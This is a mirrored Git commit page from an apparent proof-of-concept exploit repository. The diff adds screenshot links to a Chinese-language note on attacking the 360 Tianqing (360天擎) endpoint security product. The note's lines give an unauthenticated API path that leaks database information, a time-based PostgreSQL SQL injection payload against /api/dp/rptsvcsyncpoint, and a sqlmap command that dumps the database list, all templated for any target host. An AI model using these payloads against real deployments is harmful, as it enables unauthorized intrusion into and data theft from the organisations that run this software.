mirror of
https://github.com/wooluo/POC00.git
synced 2026-03-17 20:24:57 +08:00
Update 360天擎 - 未授权与sql注入.md
This commit is contained in:
parent
cfe4e82896
commit
524a2ed04c
@ -11,7 +11,7 @@
|
|||||||
|
|
||||||
### 未授权漏洞
|
### 未授权漏洞
|
||||||
```路由后拼接/api/dbstat/gettablessize```
|
```路由后拼接/api/dbstat/gettablessize```
|
||||||
|

|
||||||
|
|
||||||
### sql注入漏洞
|
### sql注入漏洞
|
||||||
比较推荐的方式先测试是否存在数据库信息泄露,存在的话大概率存在SQL注入
|
比较推荐的方式先测试是否存在数据库信息泄露,存在的话大概率存在SQL注入
|
||||||
@ -20,5 +20,7 @@
|
|||||||
|
|
||||||
{{Hostname}}/api/dp/rptsvcsyncpoint?ccid=1';SELECT PG_SLEEP(5)--
|
{{Hostname}}/api/dp/rptsvcsyncpoint?ccid=1';SELECT PG_SLEEP(5)--
|
||||||
```
|
```
|
||||||
|

|
||||||
|
|
||||||
## sqlmap
|
## sqlmap
|
||||||
python .\sqlmap.py --batch -dbs -u https://{{Hostname}}/api/dp/rptsvcsyncpoint?ccid=1
|
python .\sqlmap.py --batch -dbs -u https://{{Hostname}}/api/dp/rptsvcsyncpoint?ccid=1
|
||||||
|
|||||||
Loading…
x
Reference in New Issue
Block a user